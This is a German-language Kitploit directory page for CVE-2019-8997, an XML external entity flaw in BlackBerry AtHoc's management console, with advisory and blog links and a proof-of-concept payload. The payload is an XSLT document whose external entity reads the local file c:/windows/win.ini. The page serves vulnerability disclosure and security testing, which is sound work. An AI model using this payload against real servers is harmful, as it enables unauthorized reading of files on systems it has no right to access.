Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-8997 — Eine XML-External-Entity-Injection-Schwachstelle (XXE) im Management System (Konsole) von BlackBerry AtHoc-Versionen vor 7.6 HF-567 könnte es einem Angreifer ermöglichen, potenziell beliebige lokale Dateien vom Anwendungsserver zu lesen oder Anfragen im Netzwerk zu senden, indem er böswillig gestaltetes XML in ein vorhandenes Feld eingibt. | Kitploit
Tools/GitHubGitHub/nxkennedy/cve-2019-8997
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubnxkennedy/cve-2019-8997

CVE-2019-8997

Repository anzeigen
223vor 6 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Eine XML-External-Entity-Injection-Schwachstelle (XXE) im Management System (Konsole) von BlackBerry AtHoc-Versionen vor 7.6 HF-567 könnte es einem Angreifer ermöglichen, potenziell beliebige lokale Dateien vom Anwendungsserver zu lesen oder Anfragen im Netzwerk zu senden, indem er böswillig gestaltetes XML in ein vorhandenes Feld eingibt.

Teilen

CVE-2019-8997

Eine XML-External-Entity-Injection-(XXE)-Sicherheitslücke im Management System (Konsole) von BlackBerry AtHoc Versionen vor 7.6 HF-567 könnte es einem Angreifer ermöglichen, beliebige lokale Dateien vom Anwendungsserver zu lesen oder Netzwerkanfragen zu stellen, indem bösartig gestaltetes XML in ein vorhandenes Feld eingegeben wird.

Gemeldet von

Nolan B. Kennedy (nxkennedy)

Sicherheitshinweis

http://support.blackberry.com/kb/articleDetail?articleNumber=000047227
https://nvd.nist.gov/vuln/detail/CVE-2019-8997

Blogbeitrag

https://www.nolanbkennedy.com/feed/xxe-vulnerability-blackberry-athoc
https://www.mindpointgroup.com/blog/pen-test/xxe-vulnerability-in-blackberry-athoc-networked-crisis-communication-platform/

Proof-of-Concept-Exploit

root@kitploit:~
<!DOCTYPE doc [
<!ELEMENT doc ANY > 
<!ENTITY foo SYSTEM "file:///c:/windows/win.ini">
]>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:output method="html" />
<xsl:template match="/">

<doc>&foo;</doc>

<head></head>
<body style="margin: 0; padding: 0;" oncontextmenu="return
false;"></body>
</xsl:template>
</xsl:stylesheet>
Tool herunterladen